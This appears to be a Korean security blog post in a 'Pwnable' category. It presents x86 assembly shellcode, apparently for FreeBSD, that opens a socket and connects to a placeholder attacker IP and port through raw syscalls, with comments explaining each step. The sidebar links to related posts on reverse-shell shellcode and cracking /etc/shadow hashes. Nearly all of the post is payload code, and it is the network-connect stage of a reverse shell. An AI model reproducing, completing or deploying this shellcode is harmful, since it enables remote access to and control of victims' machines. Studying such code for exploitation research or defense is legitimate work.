.globl main
main:
# 초기화
xor %eax, %eax
xor %ebx, %ebx
xor %ecx, %ecx
xor %edx, %edx
# socket (PF_INET, SOCK_STREAM, 0) <== socket(2, 1, 0) 과 같음
push %edx
inc %edx
push %edx
inc %edx
push %edx
mov $0x61, %al
push %eax
int $0x80
# socketaddr_in
# IP 주소 Little Endian
push $0xXXXXXXXX
# Port Little Endian
pushw $0xXXXX
pushw $0x02AA
mov %esp, %ebx
# connect
# connect(3,{ AF_INET XXX.XXX.XXX.XXX:XX },16)
mov $0x10, %cl
push %ecx
push %ebx
push %eax
mov $0x62, %al
push %eax
int $0x80
'Research > Pwnable' 카테고리의 다른 글
| SHA 512, /etc/shadow decrypt (0) | 2014.01.12 |
|---|---|
| FreeBSD 에서 proc 디렉토리에 PID 가 없을때 (0) | 2013.11.07 |
| [shellcode] FreeBSD x86 Reverse Read shell (0) | 2013.08.06 |
| FreeBSD Syscall numbers (0) | 2013.08.06 |
| [shellcode] Linux x86 open, read, write (0) | 2013.08.02 |